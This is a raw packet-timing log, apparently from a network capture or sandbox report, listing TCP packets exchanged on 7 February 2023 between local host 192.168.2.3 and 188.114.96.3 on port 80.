                                                                                    Feb 7, 2023 19:45:01.706789017 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.706818104 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707425117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707462072 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707492113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707521915 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707551003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707577944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707611084 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.707611084 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.707611084 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.707628965 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.707655907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708333015 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708370924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708399057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708429098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708479881 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708513975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708528042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.708528042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.708528042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.708566904 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.708599091 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709269047 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709309101 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709342957 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709371090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709398985 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709418058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.709418058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.709418058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.709418058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.709455013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709481955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709511995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.709543943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.709543943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.709543943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.710187912 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.710222960 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.710253000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.710283041 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.710336924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.710385084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.710396051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.710396051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.710397005 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.710431099 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.713171005 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.720144987 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.728777885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.728837967 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.728877068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.728910923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.728935003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.728961945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.728991032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729021072 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729048967 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729085922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729085922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729142904 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729201078 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729237080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729264021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729290962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729325056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729325056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729325056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729343891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729371071 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729399920 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729430914 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729458094 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729485989 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729516983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729516983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729516983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729536057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729573011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729608059 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729635954 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729662895 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729696989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729697943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729697943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729722023 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729760885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729800940 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729835033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729862928 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729891062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729923010 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.729934931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729934931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.729980946 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730017900 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730050087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730079889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730108976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730133057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730153084 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730154037 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730218887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730247974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730276108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730309010 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730331898 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730331898 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730362892 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730403900 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730441093 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730477095 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730489016 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730489016 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730531931 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730564117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730580091 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730618000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730654955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730794907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730824947 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730850935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730880022 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730910063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730942011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.730952024 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.730981112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731021881 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731050968 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731062889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731097937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731126070 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731162071 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731192112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731219053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731244087 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731244087 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731261969 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731375933 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731420994 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731455088 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731509924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731539011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731554985 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731585026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731615067 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731626034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731659889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731673956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731703997 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731734037 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731766939 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731796026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731823921 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731853008 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731879950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731913090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731924057 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731925011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731925011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731959105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.731987000 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.731997013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732024908 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732089996 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732301950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732330084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732361078 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732393026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732404947 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732433081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732449055 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732474089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732502937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732532024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732562065 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732582092 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732605934 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732633114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732661009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732687950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732716084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732743979 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732773066 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732791901 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732791901 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732816935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732844114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732872009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.732913971 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.732913971 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733262062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733329058 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733374119 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733398914 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733426094 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733453035 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733485937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733499050 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733499050 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733499050 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733532906 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733561039 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733587980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733616114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733644962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733675003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733705997 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733705997 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733705997 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.733722925 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733750105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733778000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733804941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733831882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.733860970 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734112024 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734112024 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734231949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734260082 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734286070 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734313965 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734342098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734375000 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734375000 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734375000 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734392881 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734421968 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734450102 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734479904 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734507084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734536886 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734536886 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734536886 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734555006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734580994 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734610081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734637022 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734664917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734708071 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734738111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734738111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734738111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.734761000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734787941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.734817028 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735054016 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735177040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735204935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735230923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735260963 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735290051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735321999 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735321999 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735321999 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735341072 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735368013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735395908 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735424042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735451937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735481024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735510111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735510111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735510111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735527992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735555887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735584021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735614061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735641956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735670090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735699892 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735699892 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735699892 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.735721111 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.735749006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736119032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736150026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736180067 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736210108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736242056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736270905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736301899 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736301899 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736303091 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736321926 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736349106 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736377954 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736406088 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736434937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736460924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736490011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736490011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736490011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736509085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736536026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736566067 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736593962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736623049 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736649990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.736680031 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736680031 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736680031 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.736699104 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737159014 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737194061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737220049 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737247944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737276077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737308979 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737308979 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737308979 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737348080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737376928 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737404108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737433910 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737468958 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737498045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737528086 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737528086 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737528086 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737546921 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737576008 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737605095 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737632990 CET8049699188.114.96.3192.168.2.3
